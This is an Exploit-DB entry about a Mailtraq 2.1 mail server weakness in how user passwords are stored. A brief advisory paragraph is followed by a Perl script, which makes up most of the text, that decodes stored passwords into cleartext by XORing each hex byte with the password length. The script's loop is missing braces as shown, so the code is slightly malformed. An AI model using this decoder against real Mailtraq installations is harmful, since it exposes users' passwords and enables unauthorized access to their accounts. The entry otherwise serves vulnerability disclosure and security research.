Mailtraq - User Password Encoding Weakness

ID EDB-ID:22779
Type exploitdb
Reporter Noam Rathaus
Modified 2003-06-16T00:00:00


Mailtraq 2.1 .0.1302 User Password Encoding Weakness. Local exploit for windows platform


It has been reported that Mailtraq does not securely store passwords. Because of this, an attacker may have an increased chance at gaining access to clear text passwords. 


$Password = $ARGV[0]; 

print "Passwords should be something like: \\3D66656463626160\n"; 
print "Provided password: $Password\n"; 

$Password = substr($Password, 3); 
$Length = length($Password)/2; 

print "Length: $Length\n"; 

for ($i = 0; $i < $Length; $i++) 
 print "Decoding: ", substr($Password, $i*2, 2), " = "; 
 $ord = hex(substr($Password, $i*2, 2)); 

 print $ord^$Length, " (", chr($ord^$Length), ")\n";